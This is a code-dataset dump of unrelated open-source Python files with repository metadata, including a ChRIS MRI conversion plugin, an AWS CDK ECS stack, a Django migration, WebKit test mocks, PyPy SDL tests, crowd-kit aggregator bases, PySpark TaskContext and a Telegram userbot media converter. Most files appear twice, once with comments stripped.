MIN_MEMORY_LIMIT = '' # Override with string, e.g. '1Gi', '2000Mi'
MIN_GPU_LIMIT = 0 # Override with the minimum number of GPUs, as an integer, for your plugin
MAX_GPU_LIMIT = 0 # Override with the maximum number of GPUs, as an integer, for your plugin
# Use this dictionary structure to provide key-value output descriptive information
# that may be useful for the next downstream plugin. For example:
#
# {
# "finalOutputFile": "final/file.out",
# "viewer": "genericTextViewer",
# }
#
# The above dictionary is saved when plugin is called with a ``--saveoutputmeta``
# flag. Note also that all file paths are relative to the system specified
# output directory.
OUTPUT_META_DICT = {}
def define_parameters(self):
self.add_argument('--executable',
dest = 'executable',
type = str,
optional = True,
help = 'the conversion program to use',
default = '/usr/bin/mri_convert')
self.add_argument('--inputFile',
dest = 'inputFile',
type = str,
optional = True,
help = 'the input file',
default = '')
self.add_argument('--outputFile',
dest = 'outputFile',
type = str,
optional = True,
help = 'the output file',
default = '')
self.add_argument('--execArgs',
dest = 'execArgs',
type = str,
optional = True,
help = 'additonal arguments for the chosen executable',
default = '')
def run(self, options):
if not len(options.inputFile):
print("ERROR: No input file has been specified!")
print("You must specify an input file relative to the input directory.")
sys.exit(1)
if not len(options.outputFile):
print("ERROR: No output file has been specified!")
print("You must specicy an output file relative to the output directory.")
sys.exit(1)
str_cmd = '%s %s %s/%s %s/%s' % ( options.executable,
options.execArgs,
options.inputdir,
options.inputFile,
options.outputdir,
options.outputFile)
os.system(str_cmd)
def show_man_page(self):
print(Gstr_title)
print(Gstr_synopsis)
# ENTRYPOINT
if __name__ == "__main__":
chris_app = Mri_convert_ppc64()
chris_app.launch()
| true
| true
|
790ddf0a84ca9a769e99f0de79a3d0d263813d02
| 1,100
|
py
|
Python
|
python/ecs/cluster/app.py
|
marclyo/aws-cdk-examples
|
f041f07ebd4c94897e16d37ff813a38eb32645a1
|
[
"Apache-2.0"
] | 2,941
|
2019-02-08T15:29:36.000Z
|
2022-03-31T23:57:42.000Z
|
python/ecs/cluster/app.py
|
marclyo/aws-cdk-examples
|
f041f07ebd4c94897e16d37ff813a38eb32645a1
|
[
"Apache-2.0"
] | 558
|
2019-02-14T23:32:02.000Z
|
2022-03-30T00:35:11.000Z
|
python/ecs/cluster/app.py
|
marclyo/aws-cdk-examples
|
f041f07ebd4c94897e16d37ff813a38eb32645a1
|
[
"Apache-2.0"
] | 1,409
|
2019-02-12T19:13:04.000Z
|
2022-03-31T18:46:21.000Z
|
from aws_cdk import (
aws_autoscaling as autoscaling,
aws_ec2 as ec2,
aws_ecs as ecs,
core,
)
class ECSCluster(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, *kwargs)
vpc = ec2.Vpc(
self, "MyVpc",
max_azs=2
)
asg = autoscaling.AutoScalingGroup(
self, "MyFleet",
instance_type=ec2.InstanceType("t2.xlarge"),
machine_image=ecs.EcsOptimizedAmi(),
associate_public_ip_address=True,
update_type=autoscaling.UpdateType.REPLACING_UPDATE,
desired_capacity=3,
vpc=vpc,
vpc_subnets={ 'subnet_type': ec2.SubnetType.PUBLIC },
)
cluster = ecs.Cluster(
self, 'EcsCluster',
vpc=vpc
)
cluster.add_auto_scaling_group(asg)
cluster.add_capacity("DefaultAutoScalingGroup",
instance_type=ec2.InstanceType("t2.micro"))
app = core.App()
ECSCluster(app, "MyFirstEcsCluster")
app.synth()
| 26.190476
| 73
| 0.583636
|
from aws_cdk import (
aws_autoscaling as autoscaling,
aws_ec2 as ec2,
aws_ecs as ecs,
core,
)
class ECSCluster(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, *kwargs)
vpc = ec2.Vpc(
self, "MyVpc",
max_azs=2
)
asg = autoscaling.AutoScalingGroup(
self, "MyFleet",
instance_type=ec2.InstanceType("t2.xlarge"),
machine_image=ecs.EcsOptimizedAmi(),
associate_public_ip_address=True,
update_type=autoscaling.UpdateType.REPLACING_UPDATE,
desired_capacity=3,
vpc=vpc,
vpc_subnets={ 'subnet_type': ec2.SubnetType.PUBLIC },
)
cluster = ecs.Cluster(
self, 'EcsCluster',
vpc=vpc
)
cluster.add_auto_scaling_group(asg)
cluster.add_capacity("DefaultAutoScalingGroup",
instance_type=ec2.InstanceType("t2.micro"))
app = core.App()
ECSCluster(app, "MyFirstEcsCluster")
app.synth()
| true
| true
|
790ddf55f9a0fae73beca060e792297299998965
| 1,165
|
py
|
Python
|
XD/mysite/polls/migrations/0001_initial.py
|
ChyiLin/HAHA
|
d0492b7dee2881d35c000659c44099dad8b41083
|
[
"MIT"
] | null | null | null |
XD/mysite/polls/migrations/0001_initial.py
|
ChyiLin/HAHA
|
d0492b7dee2881d35c000659c44099dad8b41083
|
[
"MIT"
] | null | null | null |
XD/mysite/polls/migrations/0001_initial.py
|
ChyiLin/HAHA
|
d0492b7dee2881d35c000659c44099dad8b41083
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.4 on 2018-12-22 04:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
| 31.486486
| 114
| 0.577682
|
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
| true
| true
|
790ddf7082426bbcac3a19c111985878009197dc
| 3,413
|
py
|
Python
|
Tools/Scripts/webkitpy/tool/mocktool.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 6
|
2021-07-05T16:09:39.000Z
|
2022-03-06T22:44:42.000Z
|
Tools/Scripts/webkitpy/tool/mocktool.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 7
|
2022-03-15T13:25:39.000Z
|
2022-03-15T13:25:44.000Z
|
Tools/Scripts/webkitpy/tool/mocktool.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2011 Google Inc. All rights reserved.
# Copyright (C) 2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading
from webkitpy.common.host_mock import MockHost
from webkitpy.common.net.buildbot.buildbot_mock import MockBuildBot
from webkitpy.common.net.ewsserver_mock import MockEWSServer
from webkitpy.common.net.irc.irc_mock import MockIRC
# FIXME: Old-style "Ports" need to die and be replaced by modern layout_tests.port which needs to move to common.
from webkitpy.common.config.ports_mock import MockPort
# FIXME: We should just replace this with optparse.Values(default=kwargs)
class MockOptions(object):
"""Mock implementation of optparse.Values."""
def __init__(self, **kwargs):
# The caller can set option values using keyword arguments. We don't
# set any values by default because we don't know how this
# object will be used. Generally speaking unit tests should
# subclass this or provider wrapper functions that set a common
# set of options.
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(**kwargs)
return self
def ensure_value(self, key, value):
if getattr(self, key, None) == None:
self.__dict__[key] = value
return self.__dict__[key]
# FIXME: This should be renamed MockWebKitPatch.
class MockTool(MockHost):
def __init__(self, *args, **kwargs):
MockHost.__init__(self, *args, **kwargs)
self._deprecated_port = MockPort()
self.ews_server = MockEWSServer()
self._irc = None
self.irc_password = "MOCK irc password"
self.wakeup_event = threading.Event()
def deprecated_port(self):
return self._deprecated_port
def path(self):
return "echo"
def ensure_irc_connected(self, delegate):
if not self._irc:
self._irc = MockIRC()
def irc(self):
return self._irc
| 39.229885
| 113
| 0.730735
|
import threading
from webkitpy.common.host_mock import MockHost
from webkitpy.common.net.buildbot.buildbot_mock import MockBuildBot
from webkitpy.common.net.ewsserver_mock import MockEWSServer
from webkitpy.common.net.irc.irc_mock import MockIRC
from webkitpy.common.config.ports_mock import MockPort
class MockOptions(object):
def __init__(self, **kwargs):
# set any values by default because we don't know how this
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(**kwargs)
return self
def ensure_value(self, key, value):
if getattr(self, key, None) == None:
self.__dict__[key] = value
return self.__dict__[key]
class MockTool(MockHost):
def __init__(self, *args, **kwargs):
MockHost.__init__(self, *args, **kwargs)
self._deprecated_port = MockPort()
self.ews_server = MockEWSServer()
self._irc = None
self.irc_password = "MOCK irc password"
self.wakeup_event = threading.Event()
def deprecated_port(self):
return self._deprecated_port
def path(self):
return "echo"
def ensure_irc_connected(self, delegate):
if not self._irc:
self._irc = MockIRC()
def irc(self):
return self._irc
| true
| true
|
790ddf754117b4c22fe3e2bc8015b1a7f07d3419
| 1,107
|
py
|
Python
|
pypy/rlib/rsdl/test/test_basic.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | 1
|
2019-05-27T00:58:46.000Z
|
2019-05-27T00:58:46.000Z
|
pypy/rlib/rsdl/test/test_basic.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
pypy/rlib/rsdl/test/test_basic.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
import py
from pypy.rlib.rsdl import RSDL
from pypy.rlib.rarithmetic import r_uint
from pypy.rpython.lltypesystem import rffi
def test_sdl_init():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
RSDL.Quit()
def test_surface_basic():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
surface = RSDL.CreateRGBSurface(0, 150, 50, 32,
r_uint(0x000000FF),
r_uint(0x0000FF00),
r_uint(0x00FF0000),
r_uint(0xFF000000))
assert surface
assert rffi.getintfield(surface, 'c_w') == 150
assert rffi.getintfield(surface, 'c_h') == 50
RSDL.FreeSurface(surface)
RSDL.Quit()
def test_get_keyname():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
assert RSDL.GetKeyName(RSDL.K_PLUS)[0] == '+'
assert RSDL.GetKeyName(RSDL.K_RIGHTPAREN)[0] == ')'
assert RSDL.GetKeyName(RSDL.K_z)[0] == 'z'
def test_delay_getticks():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
RSDL.Delay(10)
i = RSDL.GetTicks()
assert i >= 10
RSDL.Quit()
| 29.918919
| 55
| 0.591689
|
import py
from pypy.rlib.rsdl import RSDL
from pypy.rlib.rarithmetic import r_uint
from pypy.rpython.lltypesystem import rffi
def test_sdl_init():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
RSDL.Quit()
def test_surface_basic():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
surface = RSDL.CreateRGBSurface(0, 150, 50, 32,
r_uint(0x000000FF),
r_uint(0x0000FF00),
r_uint(0x00FF0000),
r_uint(0xFF000000))
assert surface
assert rffi.getintfield(surface, 'c_w') == 150
assert rffi.getintfield(surface, 'c_h') == 50
RSDL.FreeSurface(surface)
RSDL.Quit()
def test_get_keyname():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
assert RSDL.GetKeyName(RSDL.K_PLUS)[0] == '+'
assert RSDL.GetKeyName(RSDL.K_RIGHTPAREN)[0] == ')'
assert RSDL.GetKeyName(RSDL.K_z)[0] == 'z'
def test_delay_getticks():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
RSDL.Delay(10)
i = RSDL.GetTicks()
assert i >= 10
RSDL.Quit()
| true
| true
|
790ddfee99fe92fd2db69b46c73d0d1385a07ab0
| 3,219
|
py
|
Python
|
build/lib/crowdkit/aggregation/base/__init__.py
|
artinmajdi/crowd-kit
|
174e15f256a4929ed71699ffc1797ea87e0e8a99
|
[
"Apache-2.0"
] | null | null | null |
build/lib/crowdkit/aggregation/base/__init__.py
|
artinmajdi/crowd-kit
|
174e15f256a4929ed71699ffc1797ea87e0e8a99
|
[
"Apache-2.0"
] | null | null | null |
build/lib/crowdkit/aggregation/base/__init__.py
|
artinmajdi/crowd-kit
|
174e15f256a4929ed71699ffc1797ea87e0e8a99
|
[
"Apache-2.0"
] | 1
|
2021-12-24T02:26:57.000Z
|
2021-12-24T02:26:57.000Z
|
__all__ = [
'BaseClassificationAggregator',
'BaseImageSegmentationAggregator',
'BaseEmbeddingsAggregator',
'BaseTextsAggregator',
'BasePairwiseAggregator',
]
import attr
from .. import annotations
@attr.s
@annotations.manage_docstring
class BaseClassificationAggregator:
""" This is a base class for all classification aggregators"""
labels_: annotations.OPTIONAL_LABELS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.LABELED_DATA) -> annotations.Annotation(type='BaseClassificationAggregator',
title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.LABELED_DATA) -> annotations.TASKS_LABELS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseImageSegmentationAggregator:
"""This is a base class for all image segmentation aggregators"""
segmentations_: annotations.TASKS_SEGMENTATIONS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.SEGMENTATION_DATA) -> annotations.Annotation(type='BaseImageSegmentationAggregator',
title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.SEGMENTATION_DATA) -> annotations.TASKS_SEGMENTATIONS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseEmbeddingsAggregator:
"""This is a base class for all embeddings aggregators"""
embeddings_and_outputs_: annotations.TASKS_EMBEDDINGS_AND_OUTPUTS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.EMBEDDED_DATA) -> annotations.Annotation(type='BaseEmbeddingsAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.EMBEDDED_DATA) -> annotations.TASKS_EMBEDDINGS_AND_OUTPUTS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseTextsAggregator:
""" This is a base class for all texts aggregators"""
texts_: annotations.TASKS_TEXTS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.TEXT_DATA) -> annotations.Annotation(type='BaseTextsAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.TEXT_DATA) -> annotations.TASKS_TEXTS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BasePairwiseAggregator:
""" This is a base class for all pairwise comparison aggregators"""
scores_: annotations.LABEL_SCORES = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.PAIRWISE_DATA) -> annotations.Annotation(type='BasePairwiseAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.PAIRWISE_DATA) -> annotations.LABEL_SCORES:
raise NotImplementedError()
| 34.612903
| 124
| 0.724138
|
__all__ = [
'BaseClassificationAggregator',
'BaseImageSegmentationAggregator',
'BaseEmbeddingsAggregator',
'BaseTextsAggregator',
'BasePairwiseAggregator',
]
import attr
from .. import annotations
@attr.s
@annotations.manage_docstring
class BaseClassificationAggregator:
labels_: annotations.OPTIONAL_LABELS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.LABELED_DATA) -> annotations.Annotation(type='BaseClassificationAggregator',
title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.LABELED_DATA) -> annotations.TASKS_LABELS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseImageSegmentationAggregator:
segmentations_: annotations.TASKS_SEGMENTATIONS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.SEGMENTATION_DATA) -> annotations.Annotation(type='BaseImageSegmentationAggregator',
title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.SEGMENTATION_DATA) -> annotations.TASKS_SEGMENTATIONS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseEmbeddingsAggregator:
embeddings_and_outputs_: annotations.TASKS_EMBEDDINGS_AND_OUTPUTS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.EMBEDDED_DATA) -> annotations.Annotation(type='BaseEmbeddingsAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.EMBEDDED_DATA) -> annotations.TASKS_EMBEDDINGS_AND_OUTPUTS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseTextsAggregator:
texts_: annotations.TASKS_TEXTS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.TEXT_DATA) -> annotations.Annotation(type='BaseTextsAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.TEXT_DATA) -> annotations.TASKS_TEXTS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BasePairwiseAggregator:
scores_: annotations.LABEL_SCORES = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.PAIRWISE_DATA) -> annotations.Annotation(type='BasePairwiseAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.PAIRWISE_DATA) -> annotations.LABEL_SCORES:
raise NotImplementedError()
| true
| true
|
790de0b9bf41aabb534f397b8543e51a0f9d7132
| 7,299
|
py
|
Python
|
python/pyspark/taskcontext.py
|
zhouyuan/sparkV
|
688e2a5850c66084d592855b4ca345baeaeabee3
|
[
"Apache-2.0"
] | 6
|
2020-06-28T08:23:22.000Z
|
2021-12-25T07:25:32.000Z
|
python/pyspark/taskcontext.py
|
zhouyuan/sparkV
|
688e2a5850c66084d592855b4ca345baeaeabee3
|
[
"Apache-2.0"
] | 4
|
2019-11-14T13:25:17.000Z
|
2021-01-21T00:08:25.000Z
|
python/pyspark/taskcontext.py
|
zhouyuan/sparkV
|
688e2a5850c66084d592855b4ca345baeaeabee3
|
[
"Apache-2.0"
] | 4
|
2020-06-28T08:23:33.000Z
|
2021-08-04T07:24:45.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import write_int, UTF8Deserializer
class TaskContext(object):
"""
.. note:: Experimental
Contextual information about a task which can be read or mutated during
execution. To access the TaskContext for a running task, use:
:meth:`TaskContext.get`.
"""
_taskContext = None
_attemptNumber = None
_partitionId = None
_stageId = None
_taskAttemptId = None
_localProperties = None
_resources = None
def __new__(cls):
"""Even if users construct TaskContext instead of using get, give them the singleton."""
taskContext = cls._taskContext
if taskContext is not None:
return taskContext
cls._taskContext = taskContext = object.__new__(cls)
return taskContext
@classmethod
def _getOrCreate(cls):
"""Internal function to get or create global TaskContext."""
if cls._taskContext is None:
cls._taskContext = TaskContext()
return cls._taskContext
@classmethod
def get(cls):
"""
Return the currently active TaskContext. This can be called inside of
user functions to access contextual information about running tasks.
.. note:: Must be called on the worker, not the driver. Returns None if not initialized.
"""
return cls._taskContext
def stageId(self):
"""The ID of the stage that this task belong to."""
return self._stageId
def partitionId(self):
"""
The ID of the RDD partition that is computed by this task.
"""
return self._partitionId
def attemptNumber(self):
""""
How many times this task has been attempted. The first task attempt will be assigned
attemptNumber = 0, and subsequent attempts will have increasing attempt numbers.
"""
return self._attemptNumber
def taskAttemptId(self):
"""
An ID that is unique to this task attempt (within the same SparkContext, no two task
attempts will share the same attempt ID). This is roughly equivalent to Hadoop's
TaskAttemptID.
"""
return self._taskAttemptId
def getLocalProperty(self, key):
"""
Get a local property set upstream in the driver, or None if it is missing.
"""
return self._localProperties.get(key, None)
def resources(self):
"""
Resources allocated to the task. The key is the resource name and the value is information
about the resource.
"""
return self._resources
BARRIER_FUNCTION = 1
def _load_from_socket(port, auth_secret):
"""
Load data from a given socket, this is a blocking method thus only return when the socket
connection has been closed.
"""
(sockfile, sock) = local_connect_and_auth(port, auth_secret)
# The barrier() call may block forever, so no timeout
sock.settimeout(None)
# Make a barrier() function call.
write_int(BARRIER_FUNCTION, sockfile)
sockfile.flush()
# Collect result.
res = UTF8Deserializer().loads(sockfile)
# Release resources.
sockfile.close()
sock.close()
return res
class BarrierTaskContext(TaskContext):
"""
.. note:: Experimental
A :class:`TaskContext` with extra contextual info and tooling for tasks in a barrier stage.
Use :func:`BarrierTaskContext.get` to obtain the barrier context for a running barrier task.
.. versionadded:: 2.4.0
"""
_port = None
_secret = None
@classmethod
def _getOrCreate(cls):
"""
Internal function to get or create global BarrierTaskContext. We need to make sure
BarrierTaskContext is returned from here because it is needed in python worker reuse
scenario, see SPARK-25921 for more details.
"""
if not isinstance(cls._taskContext, BarrierTaskContext):
cls._taskContext = object.__new__(cls)
return cls._taskContext
@classmethod
def get(cls):
"""
.. note:: Experimental
Return the currently active :class:`BarrierTaskContext`.
This can be called inside of user functions to access contextual information about
running tasks.
.. note:: Must be called on the worker, not the driver. Returns None if not initialized.
"""
return cls._taskContext
@classmethod
def _initialize(cls, port, secret):
"""
Initialize BarrierTaskContext, other methods within BarrierTaskContext can only be called
after BarrierTaskContext is initialized.
"""
cls._port = port
cls._secret = secret
def barrier(self):
"""
.. note:: Experimental
Sets a global barrier and waits until all tasks in this stage hit this barrier.
Similar to `MPI_Barrier` function in MPI, this function blocks until all tasks
in the same stage have reached this routine.
.. warning:: In a barrier stage, each task much have the same number of `barrier()`
calls, in all possible code branches.
Otherwise, you may get the job hanging or a SparkException after timeout.
.. versionadded:: 2.4.0
"""
if self._port is None or self._secret is None:
raise Exception("Not supported to call barrier() before initialize " +
"BarrierTaskContext.")
else:
_load_from_socket(self._port, self._secret)
def getTaskInfos(self):
"""
.. note:: Experimental
Returns :class:`BarrierTaskInfo` for all tasks in this barrier stage,
ordered by partition ID.
.. versionadded:: 2.4.0
"""
if self._port is None or self._secret is None:
raise Exception("Not supported to call getTaskInfos() before initialize " +
"BarrierTaskContext.")
else:
addresses = self._localProperties.get("addresses", "")
return [BarrierTaskInfo(h.strip()) for h in addresses.split(",")]
class BarrierTaskInfo(object):
"""
.. note:: Experimental
Carries all task infos of a barrier task.
:var address: The IPv4 address (host:port) of the executor that the barrier task is running on
.. versionadded:: 2.4.0
"""
def __init__(self, address):
self.address = address
| 31.873362
| 98
| 0.65735
|
from __future__ import print_function
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import write_int, UTF8Deserializer
class TaskContext(object):
_taskContext = None
_attemptNumber = None
_partitionId = None
_stageId = None
_taskAttemptId = None
_localProperties = None
_resources = None
def __new__(cls):
taskContext = cls._taskContext
if taskContext is not None:
return taskContext
cls._taskContext = taskContext = object.__new__(cls)
return taskContext
@classmethod
def _getOrCreate(cls):
if cls._taskContext is None:
cls._taskContext = TaskContext()
return cls._taskContext
@classmethod
def get(cls):
return cls._taskContext
def stageId(self):
return self._stageId
def partitionId(self):
return self._partitionId
def attemptNumber(self):
return self._attemptNumber
def taskAttemptId(self):
return self._taskAttemptId
def getLocalProperty(self, key):
return self._localProperties.get(key, None)
def resources(self):
return self._resources
BARRIER_FUNCTION = 1
def _load_from_socket(port, auth_secret):
(sockfile, sock) = local_connect_and_auth(port, auth_secret)
sock.settimeout(None)
write_int(BARRIER_FUNCTION, sockfile)
sockfile.flush()
res = UTF8Deserializer().loads(sockfile)
sockfile.close()
sock.close()
return res
class BarrierTaskContext(TaskContext):
_port = None
_secret = None
@classmethod
def _getOrCreate(cls):
if not isinstance(cls._taskContext, BarrierTaskContext):
cls._taskContext = object.__new__(cls)
return cls._taskContext
@classmethod
def get(cls):
return cls._taskContext
@classmethod
def _initialize(cls, port, secret):
cls._port = port
cls._secret = secret
def barrier(self):
if self._port is None or self._secret is None:
raise Exception("Not supported to call barrier() before initialize " +
"BarrierTaskContext.")
else:
_load_from_socket(self._port, self._secret)
def getTaskInfos(self):
if self._port is None or self._secret is None:
raise Exception("Not supported to call getTaskInfos() before initialize " +
"BarrierTaskContext.")
else:
addresses = self._localProperties.get("addresses", "")
return [BarrierTaskInfo(h.strip()) for h in addresses.split(",")]
class BarrierTaskInfo(object):
def __init__(self, address):
self.address = address
| true
| true
|
790de0d7084706fafc0cf001bb4f424782073242
| 4,045
|
py
|
Python
|
userbot/plugins/fconvert.py
|
anandhu-dev/catuserbot
|
0ae10db978c1a9bf3f4f0da991a86d85fc29c0f1
|
[
"MIT"
] | null | null | null |
userbot/plugins/fconvert.py
|
anandhu-dev/catuserbot
|
0ae10db978c1a9bf3f4f0da991a86d85fc29c0f1
|
[
"MIT"
] | null | null | null |
userbot/plugins/fconvert.py
|
anandhu-dev/catuserbot
|
0ae10db978c1a9bf3f4f0da991a86d85fc29c0f1
|
[
"MIT"
] | null | null | null |
"""File Converter
.nfc """
import asyncio
import os
import time
from datetime import datetime
from userbot.utils import admin_cmd, progress
@borg.on(admin_cmd(pattern="nfc (.*)")) # pylint:disable=E0602
async def _(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
reply_message = await event.get_reply_message()
if reply_message is None:
await event.edit("reply to a media to use the `nfc` operation.\nInspired by @FileConverterBot")
return
await event.edit("trying to download media file, to my local")
try:
start = datetime.now()
c_time = time.time()
downloaded_file_name = await borg.download_media(
reply_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to download")
)
)
except Exception as e: # pylint:disable=C0103,W0703
await event.edit(str(e))
else:
end = datetime.now()
ms = (end - start).seconds
await event.edit("Downloaded to `{}` in {} seconds.".format(downloaded_file_name, ms))
new_required_file_name = ""
new_required_file_caption = ""
command_to_run = []
force_document = False
voice_note = False
supports_streaming = False
if input_str == "voice":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".opus"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-map",
"0:a",
"-codec:a",
"libopus",
"-b:a",
"100k",
"-vbr",
"on",
new_required_file_name
]
voice_note = True
supports_streaming = True
elif input_str == "mp3":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".mp3"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-vn",
new_required_file_name
]
voice_note = False
supports_streaming = True
else:
await event.edit("not supported")
os.remove(downloaded_file_name)
return
logger.info(command_to_run)
# TODO: re-write create_subprocess_exec 😉
process = await asyncio.create_subprocess_exec(
*command_to_run,
# stdout must a pipe to be accessible as process.stdout
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
# Wait for the subprocess to finish
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
os.remove(downloaded_file_name)
if os.path.exists(new_required_file_name):
end_two = datetime.now()
await borg.send_file(
entity=event.chat_id,
file=new_required_file_name,
caption="`File Successfully converted by` @kannappan04",
allow_cache=False,
silent=True,
force_document=force_document,
